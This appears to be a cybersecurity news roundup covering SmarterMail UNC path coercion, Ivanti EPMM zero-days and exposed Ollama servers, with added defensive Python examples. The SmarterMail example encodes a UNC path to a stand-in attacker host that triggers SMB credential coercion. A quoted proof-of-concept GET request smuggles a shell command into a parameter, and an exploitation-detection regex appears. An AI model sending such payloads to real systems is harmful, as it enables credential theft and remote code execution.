It has been described as a case of unauthenticated path coercion affecting the background-of-the-day preview endpoint. “The application base64-decodes attacker-supplied input and uses it as a filesystem path without validation,” VulnCheck noted in an alert. “On Windows systems, this allows UNC [Universal Naming Convention] paths to be resolved, causing the SmarterMail service to initiate outbound SMB authentication attempts to attacker-controlled hosts. This can be abused for credential coercion, NTLM relay attacks, and unauthorized network authentication.” The vulnerability has been patched in Build 9518, released on January 22, 2026.
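The flaw class VulnCheck describes (a base64 token decoded straight into a filesystem path) placed beside a validated counterpart, as an added illustration rather than SmarterMail's own code. The root directory, the allowed file types and the UNC host `attacker.example` are constructed for the demo; `PureWindowsPath` applies Windows path rules (drive letters, `\\host\share` roots) so the check behaves the same on any OS.

```python
"""Base64 path token: the unsafe pattern the advisory describes, next to a validated one.

Constructed example, not SmarterMail code. PureWindowsPath is used so that Windows
semantics (drive letters, UNC roots such as \\host\share) are applied even when this
module runs on Linux.
"""
import base64
import binascii
from pathlib import PureWindowsPath

# Assumed directory that preview images are meant to be read from (constructed).
PREVIEW_ROOT = PureWindowsPath(r"C:\App\Backgrounds")
ALLOWED_SUFFIXES = {".jpg", ".jpeg", ".png"}


class UnsafePath(ValueError):
    """Raised when a token does not name a plain image file inside PREVIEW_ROOT."""


def encode(path: str) -> str:
    """Build a token the way a client would (UTF-8 path, standard base64)."""
    return base64.b64encode(path.encode("utf-8")).decode("ascii")


def resolve_unsafe(token: str) -> PureWindowsPath:
    """Vulnerable pattern: decode and trust the result as a path.

    A token encoding \\attacker.example\share\bg.jpg yields a UNC path; on Windows,
    opening such a path makes the service authenticate outbound over SMB.
    """
    return PureWindowsPath(base64.b64decode(token).decode("utf-8"))


def resolve_safe(token: str) -> PureWindowsPath:
    """Hardened pattern: accept only a bare image file name, then join it to the root."""
    try:
        raw = base64.b64decode(token, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError) as exc:
        raise UnsafePath("token is not valid base64/UTF-8") from exc
    if "\x00" in raw:
        raise UnsafePath("embedded NUL byte")
    candidate = PureWindowsPath(raw)
    # Anything carrying its own anchor (drive letter, leading separator, UNC or
    # \\?\ prefix) would escape PREVIEW_ROOT entirely.
    if candidate.anchor:
        raise UnsafePath(f"absolute, drive-relative or UNC path rejected: {raw!r}")
    # Exactly one component: no directories and no '..' traversal.
    if len(candidate.parts) != 1 or candidate.parts[0] in (".", ".."):
        raise UnsafePath(f"directory component or traversal rejected: {raw!r}")
    if candidate.suffix.lower() not in ALLOWED_SUFFIXES:
        raise UnsafePath(f"unexpected file type: {candidate.suffix!r}")
    return PREVIEW_ROOT / candidate


def is_unc(path: PureWindowsPath) -> bool:
    """True when the path's drive is a UNC share (two leading separators)."""
    return path.drive.startswith("\\\\")


def rejects(token: str) -> bool:
    """True when resolve_safe refuses the token."""
    try:
        resolve_safe(token)
    except UnsafePath:
        return True
    return False


if __name__ == "__main__":
    coercion_token = encode(r"\\attacker.example\share\bg.jpg")  # constructed host
    print("unsafe resolves to:", resolve_unsafe(coercion_token), "UNC:", is_unc(resolve_unsafe(coercion_token)))
    print("safe rejects it:", rejects(coercion_token))
    print("safe accepts:", resolve_safe(encode("sunset.jpg")))
```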

With two vulnerabilities in SmarterMail coming under active exploitation over the past week, it’s essential that users update to the latest version as soon as possible.

Two Ivanti EPMM Zero-Day RCE Flaws Actively Exploited, Security Updates Released

Ivanti has rolled out security updates to address two security flaws impacting Ivanti Endpoint Manager Mobile (EPMM) that have been exploited in zero-day attacks, one of which has been added by the U.S. Cybersecurity and Infrastructure Security Agency (CISA) to its Known Exploited Vulnerabilities (KEV) catalog. The critical-severity vulnerabilities are listed below:

- CVE-2026-1281 (CVSS score: 9.8) - A code injection allowing attackers to achieve unauthenticated remote code execution
- CVE-2026-1340 (CVSS score: 9.8) - A code injection allowing attackers to achieve unauthenticated remote code execution

They affect the following versions:

- EPMM 12.5.0.0 and prior, 12.6.0.0 and prior, and 12.7.0.0 and prior (Fixed in RPM 12.x.0.x)
- EPMM 12.5.1.0 and prior and 12.6.1.0 and prior (Fixed in RPM 12.x.1.x)

However, it bears noting that the RPM patch does not survive a version upgrade and must be reapplied if the appliance is upgraded to a new version. The vulnerabilities will be permanently addressed in EPMM version 12.8.0.0, which will be released later in Q1 2026.

“We are aware of a very limited number of customers whose solution has been exploited at the time of disclosure,” Ivanti said in an advisory, adding it does not have enough information about the threat actor tactics to provide “reliable atomic indicators.” The company noted that CVE-2026-1281 and CVE-2026-1340 affect the In-House Application Distribution and the Android File Transfer Configuration features. These shortcomings do not affect other products, including Ivanti Neurons for MDM, Ivanti Endpoint Manager (EPM), or Ivanti Sentry. In a technical analysis, Ivanti said it has typically seen two forms of persistence based on prior attacks targeting older vulnerabilities in EPMM. This includes deploying web shells and reverse shells for setting up persistence on the compromised appliances.

“Successful exploitation of the EPMM appliance will enable arbitrary code execution on the appliance,” Ivanti noted. “Aside from lateral movement to the connected environment, EPMM also contains sensitive information about devices managed by the appliance.” Users are advised to check the Apache access log at “/var/log/httpd/https-access_log” for signs of attempted or successful exploitation using the regular expression (regex) pattern below:

^(?!127.0.0.1:\d+ .*$).*?\/mifs\/c\/(aft|app)store\/fob\/.*?404

“Legitimate use of these capabilities will result in 200 HTTP response codes in the Apache access log, whereas successful or attempted exploitation will cause 404 HTTP response codes,” it explained. In addition, customers are being asked to review the following for any evidence of unauthorized configuration changes:

- EPMM administrators, for new or recently changed administrators
- Authentication configuration, including SSO and LDAP settings
- New push applications for mobile devices
- Configuration changes to applications you push to devices, including in-house applications
- New or recently modified policies
- Network configuration changes, including any network configuration or VPN configuration you push to mobile devices

In the event signs of compromise are detected, Ivanti is also urging users to restore the EPMM device from a known good backup or build a replacement EPMM and then migrate data to the device. Once the steps are performed, it’s essential to make the following changes to secure the environment:

- Reset the password of any local EPMM accounts
- Reset the password for the LDAP and/or KDC service accounts that perform lookups
- Revoke and replace the public certificate used for your EPMM
- Reset the password for any other internal or external service accounts configured with the EPMM solution

The development has prompted CISA to add CVE-2026-1281 to the KEV catalog, requiring Federal Civilian Executive Branch (FCEB) agencies to apply the updates by February 1, 2026.
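Ivanti's published regex applied to access-log lines, as an added example that is not part of the advisory. The log lines are constructed in a combined-log shape with `client:port` as the first field (the form the pattern's lookahead assumes), and a second parser (`LINE_RE`, added here) confirms that the 404 came from the status field rather than from a digit run elsewhere on the line.

```python
"""Scan an EPMM Apache access log for the 404 pattern Ivanti published.

IVANTI_PATTERN is the advisory's regex as given. LINE_RE is an added, stricter
parser: the advisory pattern also fires when "404" appears in a byte count or
user agent, so each hit is confirmed from the parsed status field. Log lines
below are constructed for the demo.
"""
import re
from collections import Counter
from typing import Dict, Iterable, List

# Pattern from the Ivanti advisory for /var/log/httpd/https-access_log.
IVANTI_PATTERN = re.compile(r"^(?!127.0.0.1:\d+ .*$).*?\/mifs\/c\/(aft|app)store\/fob\/.*?404")

# Combined-log style line whose first field is "client:port" (assumed format).
LINE_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


def scan(lines: Iterable[str]) -> List[Dict[str, str]]:
    """Return one record per non-localhost request to the fob endpoints that received a 404."""
    hits: List[Dict[str, str]] = []
    for line in lines:
        line = line.rstrip("\n")
        if not IVANTI_PATTERN.search(line):
            continue
        m = LINE_RE.match(line)
        if m is None or m.group("status") != "404":
            continue  # the advisory regex fired on a stray "404"; drop the false positive
        hits.append({"client": m.group("client"), "timestamp": m.group("ts"),
                     "path": m.group("path"), "status": m.group("status")})
    return hits


def clients_by_hits(hits: List[Dict[str, str]]) -> Counter:
    """Count hits per source IP (port stripped) to see who is probing."""
    return Counter(h["client"].rsplit(":", 1)[0] for h in hits)


# Constructed log lines covering the cases the advisory text distinguishes.
SAMPLE_LOG = [
    # remote client, fob endpoint, 404: the pattern Ivanti says indicates an attempt
    '10.0.0.5:51234 - - [29/Jan/2026:10:15:01 +0000] "GET /mifs/c/appstore/fob/3/5/sha256:kid=1/app.ipa HTTP/1.1" 404 196 "-" "curl/8.5.0"',
    # legitimate download: same endpoint, 200
    '10.0.0.7:51300 - - [29/Jan/2026:10:16:12 +0000] "GET /mifs/c/appstore/fob/3/5/sha256:kid=2/inhouse.ipa HTTP/1.1" 200 5120 "-" "Dalvik/2.1.0"',
    # localhost traffic excluded by the negative lookahead
    '127.0.0.1:40000 - - [29/Jan/2026:10:17:00 +0000] "GET /mifs/c/aftstore/fob/1/x HTTP/1.1" 404 196 "-" "-"',
    # second remote attempt, this time against the AFT store endpoint
    '198.51.100.9:60001 - - [29/Jan/2026:10:18:30 +0000] "GET /mifs/c/aftstore/fob/2/probe HTTP/1.1" 404 196 "-" "python-requests/2.31"',
    # unrelated 404 outside the fob endpoints
    '10.0.0.8:51400 - - [29/Jan/2026:10:19:45 +0000] "GET /mifs/login.jsp HTTP/1.1" 404 196 "-" "Mozilla/5.0"',
    # "404" inside the byte count with status 200: advisory regex fires, parser rejects
    '10.0.0.9:51500 - - [29/Jan/2026:10:20:00 +0000] "GET /mifs/c/appstore/fob/3/5/sha256:kid=3/ok.ipa HTTP/1.1" 200 4040 "-" "Dalvik/2.1.0"',
]


if __name__ == "__main__":
    found = scan(SAMPLE_LOG)
    for hit in found:
        print(hit)
    print(clients_by_hits(found))
```

Against a live appliance, replace `SAMPLE_LOG` with the lines of the file Ivanti names; a hit is a lead to investigate together with the configuration review above, not proof of compromise on its own.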

Update

In a report published January 30, 2026, researchers from watchTowr Labs said they reverse-engineered the patches, noting that the RPM fixes modify the Apache HTTPd config to replace two Bash shell scripts (“/mi/bin/map-appstore-url” and “/mi/bin/map-aft-store-url”) with newly introduced Java classes. As a result, the cybersecurity company said, the vulnerability must be exploitable through HTTP, ultimately leading to a specially crafted HTTP GET request that could be used to pull it off:

GET /mifs/c/appstore/fob/3/5/sha256:kid=1,st=theValue%20%20,et=1337133713, h=gPath%5B%60sleep%205%60%5D/e2327851-1e09-4463-9b5a-b524bc71fc07.ipa

This stems from the fact that the Bash script “/mi/bin/map-appstore-url” allows users to fetch mobile applications from the Ivanti EPMM-approved application store based on certain parameters, including:

- The index of a salt string from “/mi/files/appstore-salt.txt” (kid)
- Start time of the download operation (st)
- End time of the download operation (et)
- SHA256 hash (h), and
- The app store file to retrieve (“e2327851-1e09-4463-9b5a-b524bc71fc07”)

In other words, sending an HTTP request to the endpoint “/mifs/c/appstore/fob/3//sha256:/.ipa” will cause Apache to execute the Bash script with the input: “___.ipa__”

“While patches are available from Ivanti, applying patches will not be enough – threat actors have been exploiting these vulnerabilities as zero-days, and organizations that are as of disclosure exposing vulnerable instances to the internet must consider them compromised, tear down infrastructure and instigate incident response processes,” watchTowr CEO Benjamin Harris said.

Researchers Find 175,000 Publicly Exposed Ollama AI Servers Across 130 Countries

A new joint investigation by SentinelOne SentinelLABS and Censys has revealed that the deployment of open-source artificial intelligence (AI) tooling has created a vast “unmanaged, publicly accessible layer of AI compute infrastructure” that spans 175,000 unique Ollama hosts across 130 countries. These systems, which span both cloud and residential networks across the world, operate outside the guardrails and monitoring systems that platform providers implement by default, the company said. The vast majority of the exposures are located in China, accounting for a little over 30%. The countries with the most infrastructure footprint include the U.S., Germany, France, South Korea, India, Russia, Singapore, Brazil, and the U.K.

“Nearly half of observed hosts are configured with tool-calling capabilities that enable them to execute code, access APIs, and interact with external systems, demonstrating the increasing implementation of LLMs into larger system processes,” researchers Gabriel Bernadett-Shapiro and Silas Cutler added. Ollama is an open-source framework that allows users to easily download, run, and manage large language models (LLMs) locally on Windows, macOS, and Linux. While the service binds to the localhost address at 127.0.0[.]1:11434 by default, it’s possible to expose it to the public internet by means of a trivial change: configuring it to bind to 0.0.0[.]0 or a public interface. The fact that Ollama, like the recently popular Moltbot (formerly Clawdbot), can be hosted locally and operate outside of the enterprise security perimeter poses new security concerns.

This, in turn, necessitates new approaches to distinguish between managed and unmanaged AI compute, the researchers said. Of the observed hosts, more than 48% advertise tool-calling capabilities via their API endpoints that, when queried, return metadata highlighting the functionalities they support. Tool calling (or function calling) is a capability that allows LLMs to interact with external systems, APIs, and databases, enabling them to augment their capabilities or retrieve real-time data.

“Tool-calling capabilities fundamentally alter the threat model. A text-generation endpoint can produce harmful content, but a tool-enabled endpoint can execute privileged operations,” the researchers noted. “When combined with insufficient authentication and network exposure, this creates what we assess to be the highest-severity risk in the ecosystem.” The analysis has also identified hosts supporting various modalities that go beyond text, including reasoning and vision capabilities, with 201 hosts running uncensored prompt templates that remove safety guardrails. The exposed nature of these systems means they could be susceptible to LLMjacking, where a victim’s LLM infrastructure resources are abused by bad actors to their advantage, while the victim foots the bill. These could range from generating spam emails and disinformation campaigns to cryptocurrency mining and even reselling access to other criminal groups.
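Turning the exposure criteria above into a check, the following Python (an added example, not SentinelOne’s or Censys’s tooling) classifies an Ollama deployment from its OLLAMA_HOST bind setting and the capability metadata its models advertise, rating a non-loopback bind with tool-calling models and no authentication as the highest severity, as the researchers do. It assumes the /api/show response carries a “capabilities” list naming “tools”, and the JSON bodies used are constructed samples.

```python
import ipaddress
import json
from urllib.parse import urlsplit

# Ollama's default when OLLAMA_HOST is unset: loopback only, port 11434.
DEFAULT_HOST = "127.0.0.1:11434"
LOOPBACK_NAMES = {"localhost", "localhost.localdomain"}

# Constructed /api/show-style bodies (assumed shape: a "capabilities" list).
SHOW_TEXT_MODEL = json.dumps({"capabilities": ["completion"],
                              "details": {"family": "llama"}})
SHOW_TOOL_MODEL = json.dumps({"capabilities": ["completion", "tools"],
                              "details": {"family": "llama"}})


def bind_host(ollama_host: str) -> str:
    """Return the host part of an OLLAMA_HOST value.

    Accepts "0.0.0.0", "0.0.0.0:11434", "[::]:11434", "http://host:port"
    and the empty string (meaning Ollama's default).
    """
    value = ollama_host.strip() or DEFAULT_HOST
    if "://" not in value:
        value = "http://" + value          # urlsplit needs a scheme
    return (urlsplit(value).hostname or "").lower()


def is_loopback_only(ollama_host: str) -> bool:
    """True only when the service can be reached from the local host alone."""
    host = bind_host(ollama_host)
    if host in LOOPBACK_NAMES:
        return True
    try:
        return ipaddress.ip_address(host).is_loopback
    except ValueError:
        # A hostname we cannot resolve offline: do not assume it is safe.
        return False


def model_capabilities(show_body: str) -> set:
    """Capabilities advertised in one /api/show response body."""
    return set(json.loads(show_body).get("capabilities", []))


def assess_exposure(ollama_host: str, show_bodies: list, auth_in_front: bool) -> dict:
    """Rate an Ollama host the way the report frames the risk:
    exposed + tool-calling + no authentication is the worst case."""
    loopback = is_loopback_only(ollama_host)
    caps = set()
    for body in show_bodies:
        caps |= model_capabilities(body)
    tools = "tools" in caps
    if loopback:
        severity, reason = "low", "bound to loopback; reachable only from the host itself"
    elif tools and not auth_in_front:
        severity, reason = "critical", "publicly reachable, no authentication, tool-calling models advertised"
    elif not auth_in_front:
        severity, reason = "high", "publicly reachable, no authentication, text generation only (LLMjacking risk)"
    else:
        severity, reason = "medium", "publicly reachable behind authentication; confirm it covers every API route"
    return {"bind_host": bind_host(ollama_host), "loopback_only": loopback,
            "tool_calling": tools, "severity": severity, "reason": reason}


if __name__ == "__main__":
    for host in ("", "127.0.0.1:11434", "0.0.0.0:11434", "[::]:11434"):
        print(host or "(unset)", assess_exposure(host, [SHOW_TEXT_MODEL, SHOW_TOOL_MODEL], False))
```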

The risk is not theoretical. According to a report published by Pillar Security this week, threat actors are actively targeting exposed LLM service endpoints to monetize access to the AI infrastructure as part of an LLMjacking campaign dubbed Operation Bizarre Bazaar. The findings point to a criminal service that contains three components: systematically scanning the internet for exposed Ollama instances, vLLM servers, and OpenAI-compatible APIs running without authentication; validating the endpoints by assessing response quality; and commercializing the access at discounted rates by advertising it on silver[.]inc, which operates as a Unified LLM API Gateway. “This end-to-end operation – from reconnaissance to commercial resale – represents the first documented LLMjacking marketplace with complete attribution,” researchers Eilon Cohen and Ariel Fogel said.

The operation has been traced to a threat actor named Hecker (aka Sakuya and LiveGamer101). The decentralized nature of the exposed Ollama ecosystem, one that’s spread across cloud and residential environments, creates governance gaps, not to mention new avenues for prompt injections and proxying malicious traffic through victim infrastructure. “The residential nature of much of the infrastructure complicates traditional governance and requires new approaches that distinguish between managed cloud deployments and distributed edge infrastructure,” the companies said. “For defenders, the key takeaway is that LLMs are increasingly deployed to the edge to translate instructions into actions. As such, they must be treated with the same authentication, monitoring, and network controls as other externally accessible infrastructure.”

This week’s updates show how small changes can create real problems. Not loud incidents, but quiet shifts that are easy to miss until they add up. The kind that affects systems people rely on every day. Many of the stories point to the same trend: familiar tools being used in unexpected ways.

Security controls are being worked around. Trusted platforms turning into weak spots. What looks routine on the surface often isn’t. There’s no single theme driving everything — just steady pressure across many fronts.

Access, data, money, and trust are all being tested at once, often without clear warning signs. This edition pulls together those signals in short form, so you can see what’s changing before it becomes harder to ignore.

Major cybercrime forum takedown
FBI Seizes RAMP Forum

The U.S. Federal Bureau of Investigation (FBI) has seized the notorious RAMP cybercrime forum. Visitors to the forum’s Tor site and its clearnet domain, ramp4u[.]io, are now greeted by a seizure banner that states the “action has been taken in coordination with the United States Attorney’s Office for the Southern District of Florida and the Computer Crime and Intellectual Property Section of the Department of Justice.” On the XSS forum, RAMP’s current administrator Stallman confirmed the takedown, stating, “This event has destroyed years of my work to create the most free forum in the world, and although I hoped that this day would never come, in my heart I always knew it was possible.” RAMP was launched in July 2021 after both Exploit and XSS banned the promotion of ransomware operations. It was established by a user named Orange, who has since been outed as Mikhail Pavlovich Matveev (aka Wazawaka, m1x, Boriselcin, and Uhodiransomwar). “Groups such as Nova and DragonForce are reportedly shifting activity toward Rehub, illustrating the underground’s ability to reconstitute quickly in alternative spaces,” Tammy Harper, senior threat intelligence researcher at Flare.io, said. “These transitions are often chaotic, opening new risks for threat actors: loss of reputation, escrow instability, operational exposure, and infiltration during the scramble to rebuild trust.”

WhatsApp privacy claims challenged
Lawsuit Claims Meta Can See WhatsApp Chats in Breach of Privacy

A new lawsuit filed against Meta in the U.S. has alleged the social media giant has made false claims about the privacy and security of WhatsApp. The lawsuit claims Meta and WhatsApp “store, analyze, and can access virtually all of WhatsApp users’ purportedly ‘private’ communications” and accuses the company of defrauding WhatsApp’s users. In a statement shared with Bloomberg, Meta called the lawsuit frivolous and said that the company “will pursue sanctions against plaintiffs’ counsel.” Will Cathcart, head of WhatsApp at Meta, said, “WhatsApp can’t read messages because the encryption keys are stored on your phone, and we don’t have access to them. This is a no-merit, headline-seeking lawsuit brought by the very same firm defending NSO after their spyware attacked journalists and government officials.” Complainants claim that WhatsApp has an internal team with unlimited access to encrypted communications, which can grant access to data requests. These requests are sent to the Meta engineering team, which then grants access to a user’s messages, often without scrutiny, as the lawsuit laid out. These allegations go beyond scenarios where up to five recent messages are sent to WhatsApp for review when a user reports another user in an individual or group chat. The crux of the debate is whether WhatsApp’s security is a technical lock that can’t be picked, or a policy lock that employees can open. WhatsApp has stressed that the messages are private and that “any claims to the contrary are false.”

Post-quantum shift accelerates
CISA Publishes Guidance for PQC Adoption

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has published an initial list of hardware and software product categories that support or are expected to support post-quantum cryptography (PQC) standards. The guidance covers cloud services, collaboration and web software, endpoint security, and networking hardware and software. The list aims to guide organizations in shaping their PQC migration strategies and evaluating future technological investments. “The advent of quantum computing poses a real and urgent threat to the confidentiality, integrity, and accessibility of sensitive data — especially systems that rely on public-key cryptography,” said Madhu Gottumukkala, Acting Director of CISA. “To stay ahead of these emerging risks, organizations must prioritize the procurement of PQC-capable technologies. This product categories list will support organizations making that critical transition.” Government agencies and private sector firms are preparing for the threat posed by the advent of a cryptographically relevant quantum computer (CRQC), which the security community believes will be able to break open some forms of classical encryption. There are also concerns that threat actors could be harvesting encrypted data now in the hopes of accessing it once a quantum codebreaking machine is developed, a surveillance strategy known as harvest now, decrypt later (HNDL).

Physical access systems exposed
20 Security Flaws in Dormakaba Access Control Systems

More than 20 security vulnerabilities (from CVE-2025-59090 through CVE-2025-59109) discovered in Dormakaba physical access control systems could have allowed hackers to remotely open doors at major organizations. The flaws included hard-coded credentials and encryption keys, weak passwords, a lack of authentication, insecure password generation, local privilege escalation, data exposure, path traversal, and command injection. “These flaws let an attacker open arbitrary doors in numerous ways, reconfigure connected controllers and peripherals without prior authentication, and much more,” SEC Consult said. There is no evidence that the vulnerabilities were exploited in the wild.

Fake hiring lures steal logins
Recruitment-Themed Emails Lead to Credential Theft

A new phishing campaign is leveraging fake recruitment-themed emails that impersonate well-known employers and staffing companies, claiming to offer easy jobs, fast interviews, and flexible work. “The messages appear in multiple languages, including English, Spanish, Italian, and French, often tailored to the recipient’s location,” Bitdefender said. “Top targets include people in the U.S., the U.K., France, Italy, and Spain.” Clicking on a confirmation link in the message takes recipients to a fake page that harvests credentials, collects sensitive data, or redirects to malicious content.

Trusted cloud domains abused
New Campaign Exploits Vercel App Domains To Drop GoTo Resolve

A novel campaign has exploited the trust associated with *.vercel.app domains to bypass email filters and deceive users with financially themed lures, such as overdue invoices and shipping documents, as part of a phishing campaign observed from November 2025 to January 2026. The activity, which also employs a Telegram-gated delivery mechanism designed to filter out security researchers and automated sandboxes, is designed to deliver a legitimate remote access tool called GoTo Resolve, per Cloudflare. Details of the campaign were first documented by CyberArmor in June 2025.

Cellular location precision reduced
Apple Tests Limiting Precise Location From Cellular Networks in iOS

With iOS 26.3, Apple is adding a new “limit precise location” setting that reduces the location data available to cellular networks to increase user privacy. “The limit precise location setting enhances your location privacy by reducing the precision of location data available to cellular networks,” Apple said. “With this setting turned on, some information made available to cellular networks is limited. As a result, they might be able to determine only a less precise location — for example, the neighborhood where your device is located, rather than a more precise location (such as a street address).” According to a new support document, iPhone models from supported network providers will offer the feature. The feature is expected to be available in Germany (Telekom), the U.K. (EE, BT), the U.S. (Boost Mobile), and Thailand (AIS, True). It also requires iPhone Air, iPhone 16e, or iPad Pro (M5) Wi-Fi + Cellular.

Legacy iOS support extended
Apple Releases Updates for iOS 12 and iOS 15

In more Apple-related news, the iPhone maker has released security updates for iOS 12 and iOS 15 to extend the digital certificate required by features such as iMessage, FaceTime, and device activation to continue working after January 2027. The update is available in iOS 12.5.8 and iOS 15.8.6.

SEO poisoning-for-hire exposed
Black Hat SEO Gets a Boost from Haxor

A backlink marketplace has been discovered as a way to help customers get their malicious web pages ranked higher in search results. The group refers to themselves as Haxor, a slang word for hackers, and their marketplace as HxSEO, or HaxorSEO. The threat actors have established their operations and marketplace on Telegram and WhatsApp. The marketplace allows fraudsters to purchase a backlink to a website of their choice, from a selection of legitimate domains already compromised by the group. These compromised domains are typically 15-20 years old and have a “trust” score associated with them to show how effective the purchased backlink would be for increasing search engine rankings. Each legitimate website is compromised with a web shell that enables Haxor to upload a malicious backlink to the site. By buying and then inserting these links into their sites, threat actors can boost search rankings, drawing unsuspecting visitors to phishing pages designed to harvest their credentials or install malware. WordPress sites with plugin flaws and vulnerable PHP components are the target of these efforts. The operation offers backlinks for just $6 per listing. The idea is that when users search for keywords like “financial logins” for specific banks, the HxSEO team’s manipulation ensures the compromised sites appear ahead of the legitimate page in the search results. “HxSEO stands out for its emphasis on unethical search engine optimization (SEO) techniques, selling a service that supports phishing campaigns by improving the perceived legitimacy of malicious pages,” Fortra said. “HxSEO leverages a range of malicious tools along with unethical Search Engine Optimization (SEO) tactics to ensure malicious sites appear at the top of your search results, making compromised sites harder to spot and to lure more potential victims. They also specialize in illicit backlink sales for SEO poisoning.” The threat actors have been active since 2020.

Phishing hijacks ad accounts
Meta Business Accounts Targeted in New Campaign

Meta business accounts belonging to advertising agencies and social media managers have been targeted by a new campaign that’s designed to seize control of their accounts for follow-on malicious activities. The phishing attack begins with a message crafted to create urgency and concern, mimicking Meta’s branding to warn recipients of policy violations, intellectual property issues, or unusual activity, and instructing them to click on a fake link that’s engineered to harvest their credentials. “Once an account is compromised, the attacker: changes billing information, adding stolen or virtual cards, launches scam ads promoting fake crypto or investment platforms, [and] removes legitimate administrators, taking full control,” CyberArmor said.

Kernel bug flagged as exploited
CISA Adds Linux Kernel Flaw to KEV Catalog

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added a security flaw impacting the Linux kernel to its Known Exploited Vulnerabilities (KEV) catalog, requiring Federal Civilian Executive Branch (FCEB) agencies to apply the patches by February 16, 2026. “Linux Kernel contains an integer overflow vulnerability in the create_elf_tables() function, which could allow an unprivileged local user with access to SUID (or otherwise privileged) binary to escalate their privileges on the system,” CISA said. The vulnerability, tracked as CVE-2018-14634, has a CVSS score of 7.8. There are currently no reports of the flaw’s in-the-wild exploitation.

France pushes video sovereignty
France Says Au Revoir to Meet, Teams, Zoom for Sovereign Video Platform

The French government has announced plans to replace U.S. videoconferencing apps like Zoom, Microsoft Teams, Google Meet, and Webex with a homegrown alternative named Visio as part of efforts to improve security and strengthen its digital resilience. David Amiel, minister delegate for Civil Service and State Reform, said the country cannot risk having its scientific exchanges, sensitive data, and strategic innovations exposed to non-European actors. “Many government agencies currently use a wide variety of tools (Teams, Zoom, GoTo Meeting, or Webex), a situation that compromises data security, creates strategic dependencies on external infrastructure, leads to increased costs, and complicates cooperation between ministries,” the government said. “The gradual implementation over the coming months of a unified solution, controlled by the state and based on French technologies, marks an important step in strengthening our digital resilience.”

Student data tracking blocked
Microsoft Ordered to Stop Tracking School Children

Microsoft has been ordered to cease the use of tracking cookies in Microsoft 365 Education after the Austrian data protection authority (DSB) found that the company illegally installed cookies on the devices of a minor without consent. These cookies can be used to analyze user behavior, collect browser data, and serve targeted ads. It’s worth noting that German data protection authorities have already considered Microsoft 365 to fall short of GDPR requirements, Austrian non-profit none of your business (NOYB) said. Microsoft has four weeks to cease tracking the complainant.

Cross-border swatting ring busted
Teens Suspected in Swatting Attacks Arrested in Hungary and Romania

Hungarian and Romanian police have arrested four young suspects in connection with bomb threats, false emergency calls, and the misuse of personal data. The suspects include a 17-year-old Romanian national and three Hungarians aged 16, 18, and 20. As part of the operation, officials confiscated all their data storage devices, mobile phones, and computer equipment. The development comes in the aftermath of a probe that began in mid-July 2025 following a series of phone calls to law enforcement. The suspects approached victims on Discord, obtained their phone numbers and personal details, and then used that information to place false emergency calls in their names. “The reports included threats to blow up educational and religious institutions and residential buildings, to kill various people, and to attack police units,” authorities said. “The reports required the intervention of a significant police force.”

Latin America hit hardest
LATAM Experiences Surge in Cyber Attacks in December 2025

According to data from Check Point, organizations experienced an average of 2,027 cyber attacks per organization per week in December 2025. “This represents a 1% month-over-month increase and a 9% year-over-year increase,” the company said. “While overall growth remained moderate, Latin America recorded the sharpest regional increase, with organizations experiencing an average of 3,065 attacks per week, a 26% increase year over year.” APAC followed with 3,017 weekly attacks per organization (+2% year-over-year), while Africa averaged 2,752 attacks, representing a 10% decrease year-over-year. The education sector remained the most targeted industry in December, averaging 4,349 attacks per organization per week. The other prominent targeted sectors include governments, associations, telecommunications, and energy. Within Latin America, healthcare and medical organizations were the top targets.

Crypto laundering ring punished
Chinese National Sentenced to Prison for Crypto Scam

The U.S. Department of Justice (DoJ) announced that Chinese national Jingliang Su was sentenced today to 46 months in prison for his role in laundering more than $36.9 million from victims in a digital asset investment scam that was carried out from scam centers in Cambodia. Su has also been ordered to pay $26,867,242.44 in restitution. Su was part of an international criminal network that tricked U.S. victims into transferring funds to accounts controlled by co-conspirators, who then laundered victim money through U.S. shell companies, international bank accounts, and digital asset wallets. Su pleaded guilty to the charges, along with four others, in June 2025. “This defendant and his co-conspirators scammed 174 Americans out of their hard-earned money,” said Assistant Attorney General A. Tysen Duva of the Justice Department’s Criminal Division. “In the digital age, criminals have found new ways to weaponize the internet for fraud.” In all, eight co-conspirators have pleaded guilty so far, including Jose Somarriba and ShengSheng He.

Major dark web operator convicted
Empire Cybercrime Market Owner Pleads Guilty

Raheim Hamilton (aka Sydney and Sydney), 30, of Suffolk, Virginia, has pleaded guilty in the U.S. to a federal drug conspiracy charge in connection with operating a dark web marketplace called Empire Market between 2018 and 2020, alongside Thomas Pavey (aka Dopenugget). “During that time, the online market facilitated more than four million transactions between vendors and buyers valued at more than $430 million, making it one of the largest dark web marketplaces of its kind at the time,” the DoJ said. “The illegal products and services available on the site included controlled substances, compromised or stolen account credentials, stolen personally identifying information, counterfeit currency, and computer-hacking tools. Sales of controlled substances were the most prevalent activity, with net drug sales totaling nearly $375 million over the life of the site.” Hamilton agreed to forfeit certain ill-gotten proceeds, including about 1,230 bitcoin and 24.4 Ether, as well as three properties in Virginia. Pavey, 40, pleaded guilty last year to a federal drug conspiracy charge and admitted his role in creating and operating Empire Market. He is currently awaiting sentencing.

Darknet operator admits role
Slovakian Man Pleads Guilty to Operating Darknet Market

Alan Bill, 33, of Bratislava, has pleaded guilty to his involvement in a darknet market called Kingdom Market that sold drugs and stolen personal information between March 2021 and December 2023. Bill has also admitted to receiving cryptocurrency from a wallet associated with Kingdom, in addition to assisting with the creation of Kingdom’s forum pages on Reddit and Dread and having access to Kingdom usernames that made postings on behalf of Kingdom on social media accounts. As part of his plea agreement, Bill has agreed to forfeit five different types of coins in a cryptocurrency wallet, as well as the Kingdommarket[.]live and Kingdommarket[.]so domains, which have been shut down by authorities. Bill is scheduled to be sentenced on May 5, 2026. “Bill was arrested December 15, 2023, at Newark Liberty International Airport after a customs inspection found two cellular telephones, a laptop, a thumb drive, and a hardware wallet used to store cryptocurrency private keys,” the DoJ said. “The electronics contained evidence of his involvement with Kingdom.”

Android theft defenses expanded
Google Announces New Anti-Theft Features for Android

